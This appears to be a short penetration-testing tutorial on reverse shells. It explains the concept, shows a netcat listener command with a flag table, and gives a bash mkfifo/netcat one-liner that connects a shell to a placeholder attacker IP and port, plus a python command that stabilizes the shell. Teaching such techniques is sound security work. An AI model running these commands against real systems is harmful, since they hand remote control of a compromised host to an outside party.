# Reverse Shell A `Reverse Shell` is the most common type of shell, as it is the quickest and easiest method to obtain control over a compromised host. Once we identify a vulnerability on the remote host that allows remote code execution, we can start a `netcat` listener on our machine that listens on a specific port, say port `1234`. With this listener in place, we can execute a `reverse shell command` that connects the remote systems shell, i.e., `Bash` or `PowerShell` to our `netcat` listener, which gives us a reverse connection over the remote system. Most `Reverse Shells` can be found online, making it unnecessary in most circumstances to list them all here. ## Resources: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - https://highon.coffee/blog/reverse-shell-cheat-sheet/ ## Listeners: #### Netcat Listener The first step is to start a `netcat` listener on a port of our choosing: ```shell nc -lvnp 9443 ``` | Flag | Description | | --------- | ----------------------------------------------------------------------------------- | | `-l` | Listen mode, to wait for a connection to connect to us. | | `-v` | Verbose mode, so that we know when we receive a connection. | | `-n` | Disable DNS resolution and only connect from/to IPs, to speed up the connection. | | `-p 9443` | Port number `netcat` is listening on, and the reverse connection should be sent to. | Now that we have a `netcat` listener waiting for a connection, we can execute the reverse shell command that connects to us. ## Shells: ### Bash ```shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT) >/tmp/f ``` ## Stabilize a shell: ### Python 3 ```shell python3 -c 'import pty; pty.spawn("/bin/bash")' ```